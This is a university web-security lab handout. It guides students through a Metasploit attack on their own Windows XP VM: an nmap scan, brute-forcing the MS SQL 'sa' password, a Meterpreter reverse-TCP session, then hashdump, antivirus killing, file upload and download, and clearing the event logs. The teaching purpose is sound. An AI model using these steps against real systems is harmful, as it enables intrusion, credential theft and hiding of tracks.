Module 5: Lab Exercise

Exploiting Web Applications and Network Machines

MCY 670 Web Security

Lab Report Submission Instructions

You are required to submit a lab report, which should include comments, descriptions, and explanations of each step that you
perform. You must also include a small write up on each of the segment, and the necessity of each tool that you will be exploring in
this lab task. Include screenshots of each step that you complete along with the texts in your lab report.

Submission requirements: Lab report

File format: MSWord or pdf (preferred)

Report requirements

• Include your name and lab title at the top of the report.
• Number the questions and answers and answer each question in your lab report in sequence.
• For each response, include the required text as well as all necessary and appropriate screenshots while performing the task. Crop
the screenshots as necessary so that the text in the images are properly visible.
o You may use the Snipping Tool on Windows to take screenshots from your PC, by clipping the area on the virtual machine
screen. If you are using a Mac PC, press and hold together: Shift, Command, and 4, to enable the selection cursor for
capturing screenshots.
• At the end of your report, write a brief reflection of the lab exercise
o What was the most valuable feature of the lab?
o What did you learn from this experience?
o Which concepts and terminology could you relate from the theoretical content to this lab experience?
o How did you prepare for this lab?
o What changes are you considering in preparing for your next lab?
• Use black font color for texts
• If uploading an MSWord format file, view the uploaded file from Canvas to make sure that the layout of images and texts are not
overlapping in the report. If the contents seem to have moved around, upload a pdf instead of an MSWord file.
Part 1: Basics of Common MSF Commands and Finding a Specific Exploit and Target

1. Using Metasploit requires an intuitive reflex in the way the tool is used. Below are some commands which are useful for
maneuvering the Metasploit framework using msfconsole. Once you are in the msfconsole prompt, you may use the following
commands according to your necessity.
 show (displays the list of every module in MSF)
 show exploits (displays the exploit modules in MSF. Try to display auxiliary modules, options, payloads, targets, etc.)
 search YOUR_SEARCH_STRING (searches MSF for matching module names)
 use PATH_TO_MODULE (selects and loads the given module on MSF)
 back (unloads the current module on MSF)
 set OPTION_NAME OPTION_VALUE (sets a current option, e.g. RHOST, with a value, e.g. 10.2.247.2)
 exploit (Executes an exploit which has been loaded and configured currently)

2. Let’s say we will be finding a specific module, loading it, and then find the possible system exploitation targets.
 Search the “ms08_067” netapi module
 Use the path found, and load the module on msfconsole
 Display the list of payloads available for the loaded module
 Display the list of targets for the loaded module

Question:

1. What does the command “show options” or “show payloads” display when you have not selected a module, compared
to when you have a module selected?
Part 2: Using Meterpreter and Exploiting a Network Machine

Target machine: Windows VM

Note: Make sure that you use the IP address of your own WINDOWS VM as specified in the IP address document.

In this part, we will perform a sequence of steps to determine an exploitable service running on a target machine and then exploit
the machine. The actions are described in the following phases.

a) Setting up the Target VM Service

First, we will need to ensure that our target service is running properly.

1. Log in to your Windows XP VM

2. We have to ensure that our MS SQL Server is configured to receive network connections. The following instructions is for the
Windows target VM, to ensure that the MS SQL Server is configured properly.
 MS SQL Service Manager Window
 Browse to Start > All Programs > Microsoft SQL Server 2005 > Configuration Tools
 Select SQL Server Configuration Manager
 Fix IP configuration
 Within the SQL Server Configuration Manager window
 SQL Server 2005 Network Configuration > Protocols for SQLEXRESS (double click)
 TCP/IP (double click)
 Ensure the following field contents:
 Protocol > Listen All = No, Enabled = Yes
 IP Addresses > IP1 > IP Address (put your Windows VM IP here)
 Ensure that the service is running properly
 SQL Server 2005 Services > SQL Server (SQLEXPRESS) > Right Click > Start
 Note: If you already see it running, then stop and start again.
 State of SQL Server (SQLEXPRESS) should change to Running
3. You are done setting up the Windows VM – Close the window now.

b) Finding a Vulnerable Service on the Target VM

Next, we attempt to exploit our target from the Kali Linux VM.

1. Log in to your Kali Linux VM and launch msfconsole from the command line terminal
2. Scan the target machine for open ports
 Use nmap to scan your target machine’s IP (use your Windows VM IP here)
 Use the following arguments for nmap
 Scan Technique: Connect()
 Enable OS detection, version detection, script scanning, and traceroute
 IP Protocol Ping
 Your command should be in the format: nmap […. arguments …] IP_OF_TARGET_VM
 Hint 1: Use “nmap -help” to see the list of supported arguments.
 Hint 2: Use “nmap –help | grep YOUR_SEARCH” to see filtered results
 Examples
 nmap –help | grep Connect (Filter lines with the word Connect)
 nmap –help | grep TCP | grep UDP (Filter lines with the words TCP and UDP)
 nmap –help | grep “Increase verbosity” (Filter lines with the text Increase verbosity)
 You are expected to browse through the list of supported arguments and find the three arguments mentioned above.
3. The next part is to identify an open port for a service which usually runs on a TCP port.
 From the results obtained from the nmap scan, see if you have the Microsoft SQL Server running.
 Identify and confirm the port on which the service is running (it should be running on port 1433)
4. Once confirmed, we will predict the UDP port for the target service, which is usually the next logical port on the machine.
 In this case, we will attack the MS SQL Server running on the target VM.
 The UDP port for the service is the next logical port (E.g.: if a service is running on port 5333, the UDP port is 5334).
5. Scan that particular (predicted) UDP port for the selected service which we are going to exploit.
 Use nmap to scan the target UDP port of the target machine
 Use arguments for nmap for the following:
 UDP Scan
 Only scan specified ports
 Your command should be in the format: nmap […. arguments …] IP_OF_TARGET_VM
 You are expected to browse through the list of supported arguments and find the three arguments mentioned above.
 Use Hint 1 and Hint 2 from earlier
 The nmap scan result for the UDP scan should show that the UDP port for MS SQL is in the open state.
6. Next, we will search and load a ping module for that service.
 Search and load the “mssql_ping” module on msfconsole
7. We will run the ping module to determine the details of that particular service.
 Display the list of options for mssql_ping
 Set RHOSTS to your Windows VM IP-address
 Set THREADS to 20
 Execute the exploit for the mssql_ping module with the exploit command (or run command)
 Upon completion, you should be able to see the details of the MS SQL Server running on the Windows VM
8. Once verified the target, we will search and load a brute-force login module for that service.
 Search and load the “mssql_login” module on msfconsole
9. We will use a common username and passwords list, and execute a brute-force login exploitation on that service. In our case,
we will use a popular wordlist file by Fast Track. Open a new terminal window and run the following commands:
 sudo updatedb (updates the search index on your Kali machine)
 locate fasttrack.txt (find the location of the wordlist file on the machine)
10. Switch over to the terminal window where msfconsole is running
 Coming back to the msfconsole terminal, display the list of options for mssql_login
 Set PASS_FILE to the path_to_fasttrack_wordlist that you found earlier
 Set USERNAME to sa (this is a common default username for system administrators for MS SQL Servers)
 Set RHOSTS to the target VM IP-address (use your Windows VM IP)
 Set THREADS to 10
 Set VERBOSE to false (keeping it true is also OK, but will show the results for all attempted passwords)
 Verify the values for the options that you have set and execute the exploit
11. If successful, we will obtain the password for the common username that we used.
 Upon completion of the mssql_login exploitation execution, you should be able to see the results with a successful
login username:password for the MS SQL server running on the Windows VM.
 Remember/Save the password that you found for “sa” user

c) Establishing a Meterpreter Session with the Target VM

Next, we will search and load a payload to establish a Meterpreter session for use with the target machine.

1. We will use the xp_cmdshell stored procedure on MS SQL to interact with the Windows XP OS using Meterpreter
 Search and load the “mssql_payload” module on msfconsole
2. Display the list of options for mssql_payload
3. Look for “reverse_tcp” in the list of displayed options
 It should be something similar to windows/meterpreter/reverse_tcp
 Set the current payload with the path you found (set payload path_to_reverse_tcp_payload)
4. Set the connection specifications for the reverse TCP connection to the attacker’s machine (Kali VM):
 Set LHOST to the attacker’s IP-address (your Kali Linux IP)
 Set LPORT to 4443, i.e., the attacker’s port from which you will be connecting
 Set RHOSTS to target VM IP-address (your Windows VM IP)
 Set RPORT to 1433, i.e., the TCP port for the MS SQL Server on the target
 Set USERNAME to sa (this is a common default username for system administrators for MS SQL Servers)
 Set PASSWORD to the password that you found earlier with the mssql_login exploitation.
5. Now, you’re all set for exploiting the target Windows VM using Meterpreter with a reverse TCP payload.
 Recheck all the OPTION settings
 Make sure that your Windows target VM is not idle (log in to the machine and keep it alive).
 Execute the exploit
 The exploit will try to establish the Meterpreter session with the target machine.
6. Once the exploit is launched, you will see a percentage counter from 0% to 100% for the Command Stager.
 You may have to try a few times in case the Command Stager fails.
 Sometimes, Windows also keeps a port busy, so, you may have to restart the Windows VM, and try again.
 If you are trying multiple times, you may try to change the LPORT to some other port (E.g. 4444)
7. If you are successful, you will see the following prompt:
 Meterpreter session 1 opened (WINDOWS_TARGET_IP -> KALI_ATTACKER_IP)
 Your command line prompt will also now change to meterpreter >

Congratulations, you have now successfully entered the target machine remotely!

d) Post Exploitation Information Extraction

In this phase, we will try to extract information for the exploited target VM using the established Meterpreter session.

1. We will try to migrate the established Meterpreter session to a new and stable process from the initial service that we exploited
 run post/windows/manage/migrate
 Finds a more stable process, and migrates the Meterpreter session to that process
 Ensures the Meterpreter session does not die in case the current process is terminated on the target machine
 Ideally, an attacker will run the migrate command after every short interval to ensure continuity of the session
2. Once the Meterpreter session is migrated, we will then run some commands on the target machine.
 screenshot
 Captures the current screenshot on the target machine
 Displays the location on the attacker’s machine where the screenshot has been saved
 Browse to the displayed location on your Kali Linux VM and view the screenshot
 sysinfo
 Displays the system information of the target machine
 getuid
 Retrieves the current user ID on the target machine
 ps
 Displays the list of running processes on the target system
 use priv
 Switches the Meterpreter session command to a privileged user
 run post/windows/gather/hashdump
 Collects and dumps the password hashes from the target system
 run post/windows/manage/killav
 Kill the anti-virus process running on the target machine
 pwd
 Displays the current working directory
 dir (or ls)
 Displays the list of files in the directory
  cd PATH_YOU_WANT_TO_MOVE
 You can use the cd command to change the directory and browse the contents
 You can use command auto-completion to find other directories that you can browse
 cd C:/
 cd > hit tab to see suggestions > type the first few letters and hit tab again
 Try to move to the student user’s Desktop directory located in
C:\Documents and Settings\student\Desktop
 download PATH\TO\FILE
 This will download the given file from the target machine to the attacker’s machine
 The output will display the location where the file is downloaded on your Kali VM
 Log in to your Windows VM > Create a new text file test.txt on your desktop > Put in some text, save,
and close the file. We will try to download this file from the target VM to our attacker’s machine.
 Use the cd command to move to the student user’s Desktop directory (shown above)
 Use the download test.txt command to download the file to your Kali VM.
 In a separate terminal window on you Kali VM, move to the directory where the file was downloaded.
 Run the following command to view the contents of the downloaded file: cat text.txt
 You can also use Kali Linux’s file browser to locate and open the file.
 upload LOCAL_FILE REMOTE_LOCATION
 This will upload a local file to the attacker’s system to the specified location on the remote machine.
 Create a sample text file on your Kali VM. Then, use this command to upload the file to the remote machine.
 This is helpful if you are uploading a virus or a Trojan malware to the target machine.
 You can also change the contents of the file you downloaded earlier and upload it back.
 On your Kali VM desktop, double-click on the Home directory
 Open the test.txt file, modify some contents, save, and close the file.
 Run the command upload /home/student/test.txt
 Assuming your current working directory is the student user’s desktop, not specifying the destination
(REMOTE_LOCATION) will copy the file to the current working directory. Therefore, the original
text.txt file will be replaced on the desktop.
 Log in to your Windows VM and verify to see the modified contents of the same file!
 edit filename
 You can remotely edit a file on the target machine from the attacker’s machine. The editor will be opened in
the VIM editor.
 Assuming your current working directory is the student user’s desktop, run to command edit test.txt to
edit the test.txt file on the student user’s desktop
 VIM editor commands:
 Type i to switch to insert mode
 Hit the esc key to stop the insert mode
 Type :x! to save and exit
 Log in to your Windows VM and verify to see the modified contents of the same file!
 shell
 This will create and open a standard command line shell on the target Windows VM
 Type exit to switch back to the Meterpreter shell
 clearev
 This will delete all events on the target Windows VM for all applications, system, and security logs.
 Before you run the Meterpreter command, go to the Windows VM. From the start menu, right click on My
Computer, and then click Manage. On the left-column, expand Event Viewer, and click on the Application,
Security, and System tabs. Look at the contents.
 After, you have executed the clearev command from Meterpreter, open the Computer Management
console on the Windows VM again, and see the difference!

Question:

2. What is “reverse TCP”? Why/How is it useful for setting up remote connections?

3. How do you think the clearev command is useful while launching an attack?